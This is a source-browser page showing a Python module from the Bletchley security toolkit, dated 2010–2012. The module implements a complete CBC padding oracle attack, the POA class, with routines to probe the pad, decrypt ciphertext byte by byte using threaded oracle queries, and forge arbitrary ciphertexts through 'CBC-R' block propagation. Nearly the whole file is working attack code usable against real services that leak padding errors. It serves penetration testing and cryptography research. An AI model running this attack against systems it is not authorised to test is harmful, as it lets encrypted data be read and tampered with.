source: trunk/lib/bletchley/CBC/__init__.py @ 43

Last change on this file since 43 was 43, checked in by tmorgan, 11 years ago

Fixed more Python3 conversion issues

Made several improvements to the probe and decryption routines to account for cases where corrupted blocks cause unintentional random failures due to insertion of critical delimiters or failure to decode from UTF-8.

File size: 14.5 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class POA:
29    """This class implements padding oracle attacks given a ciphertext and
30    function that acts as a padding oracle.
31
32    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
33    This attack was first described in:
34     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
35      WTLS" by Serge Vaudenay (2002)
36
37    POA objects are not caller thread-safe.  If multiple threads need to work
38    simultaneously on the same ciphertext and oracle, create a
39    separate instance. POA objects can execute tasks internally using
40    multiple threads, however.
41
42    """
43
44    ## private
45    _thread_result = None
46    _oracle = None
47    _ciphertext = None
48    _iv = None
49
50    ## protected (reading ok, changing not ok)
51    block_size = None
52
53    ## public (r/w ok)
54    retries = 2
55    decrypted = None
56    threads = None
57    log_fh = None
58   
59    def __init__(self, oracle, block_size, ciphertext, iv=None,
60                 threads=1, decrypted=b'', log_file=None):
61        """Creates a new padding oracle attack (POA) object.
62
63        Arguments:
64        oracle -- A function which returns True if the given ciphertext
65         results in a correct padding upon decryption and False
66         otherwise.  This function should implement the prototype:
67           def myOracle(ciphertext, iv): ...
68         If the initialization vector (iv) is unknown is not included in
69         the ciphertext message, it can be ignored in the oracle
70         implementation (though some limitations will result from this).
71
72        block_size -- The block size of the ciphertext being attacked.
73         Is almost always 8 or 16.
74
75        ciphertext -- The ciphertext to be decrypted
76
77        iv -- The initialization vector associated with the ciphertext.
78         If none provided, it is assumed to be a block of 0's
79
80        threads -- The maximum number of parallel threads to use during
81         decryption.  If more than one thread is used, then the oracle
82         function will be called in parallel.  It should implement any
83         internal locking necessary to prevent race conditions where
84         applicable.
85
86        decrypted -- If a portion of the plaintext is already known (due
87         to a prior, partially successful decryption attempt), then this
88         may be used to restart the decryption process where it was
89         previously left off.  This argument is assumed to contain the
90         final N bytes (for an N-byte argument) of the plaintext; that
91         is, the tail of the plaintext including the pad.
92
93        log_file -- A Python file object where log messages will be
94         written.
95
96        """
97
98        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
99            raise InvalidBlockError(block_size,len(ciphertext))
100        if(iv != None and len(iv)%block_size != 0):
101            raise InvalidBlockError(block_size,len(iv))
102        if len(decrypted) > len(ciphertext):
103            raise Exception #XXX: custom exception
104       
105        self.block_size = block_size
106        self.decrypted = decrypted
107        self.threads = threads
108        self.log_fh = log_file
109
110        self._oracle = oracle
111        self._ciphertext = ciphertext
112        if iv == None:
113            self._iv = b'\x00'*self.block_size
114        else:
115            self._iv = iv
116
117
118    def log_message(self, s):
119        if self.log_fh != None:
120            self.log_fh.write(s+'\n')
121
122
123    def probe_padding(self):
124        """Attempts to verify that a CBC padding oracle exists and then determines the
125        pad value. 
126
127        Returns the pad string, or None on failure.
128        XXX: Currently only works for PKCS 5/7.
129        """
130
131        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
132        final = blocks[-1]
133        if len(blocks) == 1:
134            # If only one block present, then try to use IV as prior
135            prior = self._iv
136        else:
137            prior = blocks[-2]
138
139        ret_val = None
140        # First probe for beginning of pad
141        for i in range(0-self.block_size,0):
142            if i == -1:
143                break
144            tweaked = prior[i] ^ 0xFF
145            tweaked = struct.pack("B", tweaked)
146            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final, self._iv):
147                break
148
149        pad_length = 0-i
150        self.log_message("Testing suspected pad length: %d" % pad_length)
151        if pad_length > 1:
152            # XXX: If this test case fails, we should try instead
153            # lengthing the pad by one byte with all 256 values (as is
154            # done in the 1-byte pad case).
155            #
156            # Verify suspected pad length by changing last pad byte to 1
157            # and making sure the padding succeeds
158            tweaked = prior[-1] ^ (pad_length^1)
159            tweaked = struct.pack("B", tweaked)
160
161            #XXX: This replaces the pad bytes with spaces.  The hope is
162            #     that any UTF-8 decoding errors that the pad bytes
163            #     might generate are addressed this way.  It is not yet
164            #     well tested.  An option should be added to allow other
165            #     bytes to be used or to turn off the behavior.
166            prior = bytearray(prior)
167            for q in range(-16,-1):
168                prior[q] = prior[q]^(pad_length^32) # space
169
170            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final, self._iv):
171                ret_val = buffertools.pkcs7Pad(pad_length)
172
173        else:
174            # Verify by changing pad byte to 2 and brute-force changing
175            # second-to-last byte to 2 as well
176            tweaked = prior[-1] ^ (2^1)
177            tweaked = struct.pack("B", tweaked)
178            for j in range(1,256):
179                guess = prior[-2] ^ j
180                guess = struct.pack("B", guess)
181                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final, self._iv):
182                    # XXX: Save the decrypted byte for later
183                    ret_val = buffertools.pkcs7Pad(pad_length)
184
185        return ret_val
186
187
188    # XXX: This could be generalized as a byte probe utility for a variety of attacks
189    def _test_value_set(self, prefix, suffix, value_set):
190        for b in value_set:
191            if self._thread_result != None:
192                # Stop if another thread found the result
193                break
194            if self._oracle(prefix+struct.pack("B",b)+suffix, self._iv):
195                self._thread_result = b
196                break
197
198
199    def decrypt_next_byte(self, prior, block, known_bytes):
200        """Decrypts one byte of ciphertext by modifying the prior
201        ciphertext block at the same relative offset.
202
203        Arguments:
204        prior -- Ciphertext block appearing prior to the current target
205        block -- Currently targeted ciphertext block
206        known_bytes -- Bytes in this block already decrypted
207
208        """
209
210        if(len(block)!=self.block_size):
211            raise InvalidBlockError
212        numKnownBytes = len(known_bytes)
213       
214        if(numKnownBytes >= self.block_size):
215            return known_bytes
216       
217        prior_prefix = prior[0:self.block_size-numKnownBytes-1]
218        base = prior[self.block_size-numKnownBytes-1]
219        # Adjust known bytes to appear as a PKCS 7 pad
220        suffix = [0]*numKnownBytes
221        for i in range(0,numKnownBytes):
222            suffix[i] ^= prior[0-numKnownBytes+i]^known_bytes[i]^(numKnownBytes+1)
223        suffix = struct.pack("B"*len(suffix),*suffix)+block
224
225
226        for x in range(0, 1+self.retries):
227            # Each thread spawned searches a subset of the next byte's
228            # 256 possible values
229            self._thread_result = None
230            threads = []
231            for i in range(0,self.threads):
232                t = threading.Thread(target=self._test_value_set, 
233                                     args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.threads)))
234                t.start()
235                threads.append(t)
236               
237            for t in threads:
238                t.join()
239               
240            # If a byte fails to decrypt, it could be because the prior
241            # block's decrypted value violates UTF-8 decoding rules, or
242            # because it randomly introduced a delimiter that causes
243            # problems.  If retries are enabled, we insert an additional
244            # random block before the prior block so that the decrypted
245            # value can be changed.
246            if self._thread_result == None:
247                if x < self.retries:
248                    self.log_message("Value of a byte could not be determined. Retrying...")
249                    prior_prefix = bytes([random.getrandbits(8) for i in range(self.block_size)]) + prior_prefix
250            else:
251                break
252
253        if self._thread_result == None:
254            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
255            raise Exception #XXX: custom exception
256       
257        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
258        self.decrypted = decrypted + self.decrypted
259        #  Return previous bytes together with current byte
260        return decrypted+known_bytes
261   
262
263    def decrypt_block(self, prior, block, last_bytes=b''):
264        """Decrypts the block of ciphertext provided as a parameter.
265
266        """
267
268        while(len(last_bytes)!=self.block_size):
269            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)
270
271        self.log_message("Decrypted block: %s" % repr(last_bytes))
272        return last_bytes
273
274
275    def decrypt(self):
276        """Decrypts the previously supplied ciphertext. If the IV was
277        not provided, it assumes a IV of zero bytes.
278
279        """
280
281        if len(self.decrypted) == 0:
282            # First decrypt the padding (quick to decrypt and good sanity check)
283            pad_bytes = self.probe_padding()
284            if pad_bytes == None:
285                # XXX: custom exception
286                raise Exception
287           
288            self.decrypted = pad_bytes
289
290
291        # Start where we left off last, whether that be with just a pad,
292        # or with additional decrypted blocks.
293
294        # number of bytes in any partially decrypted blocks
295        num_partial = len(self.decrypted) % self.block_size
296
297        # number of blocks fully decrypted
298        finished_blocks = len(self.decrypted) // self.block_size
299
300        # contents of the partial block
301        partial = self.decrypted[0:num_partial]
302
303        # contents of fully decrypted blocks
304        decrypted = self.decrypted[num_partial:]
305       
306        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
307
308        # Start with the partially decrypted block at the end, and work
309        # our way to the front.  Don't decrypt the very first block of
310        # the ciphertext yet.
311        for i in range(len(blocks)-1-finished_blocks, 0, -1):
312            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
313            partial = b''
314               
315        # Finally decrypt first block
316        decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted
317       
318        # Remove the padding and return
319        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)
320
321
322    def encrypt_block(self, plaintext, ciphertext):
323        """Encrypts a block of plaintext.  This is accomplished by
324        decrypting the supplied ciphertext and then computing the prior
325        block needed to create the desired plaintext at the ciphertext's
326        location.
327
328        Returns the calculated prior block and the provided ciphertext
329        block as a tuple.
330
331        """
332        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
333            raise InvalidBlockError(self.block_size,len(plaintext))
334
335        ptext = self.decrypt_block(b'\x00'*self.block_size, ciphertext)
336        prior = buffertools.xorBuffers(ptext, plaintext)
337        return prior,ciphertext
338   
339   
340    def encrypt(self,plaintext):
341        """Encrypts a plaintext value through "CBC-R" style prior-block
342        propagation.
343       
344        Returns a tuple of the IV and ciphertext. 
345
346        NOTE: If your target messages do not include an IV with the
347        ciphertext, you can instead opt to encrypt a suffix of the
348        message and include the IV in the the middle of the ciphertext as
349        if it were an encrypted block. This one block alone will decrypt
350        to an uncontrollable random value, but with careful placement,
351        this might be ok.
352
353        """
354
355        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size), 
356                                         self.block_size)
357
358        if (len(self.decrypted) >= self.block_size
359            and len(self._ciphertext) >= 2*self.block_size):
360            # If possible, reuse work from prior decryption efforts on original
361            # message for last block
362            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
363            final_plaintext = self.decrypted[0-self.block_size:]
364            prior = buffertools.xorBuffers(old_prior,
365                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
366            ciphertext = self._ciphertext[0-self.block_size:]
367        else:
368            # Otherwise, select a random last block and generate the prior block
369            ciphertext = struct.pack("B"*self.block_size, 
370                                     *[random.getrandbits(8) for i in range(self.block_size)])
371            prior,ciphertext = self.encrypt_block(blocks[-1], ciphertext)
372
373        # Continue generating all prior blocks
374        for i in range(len(blocks)-2, -1, -1):
375            prior,cblock = self.encrypt_block(blocks[i],prior)
376            ciphertext = cblock+ciphertext
377       
378        # prior as IV
379        return prior,ciphertext
Note: See TracBrowser for help on using the repository browser.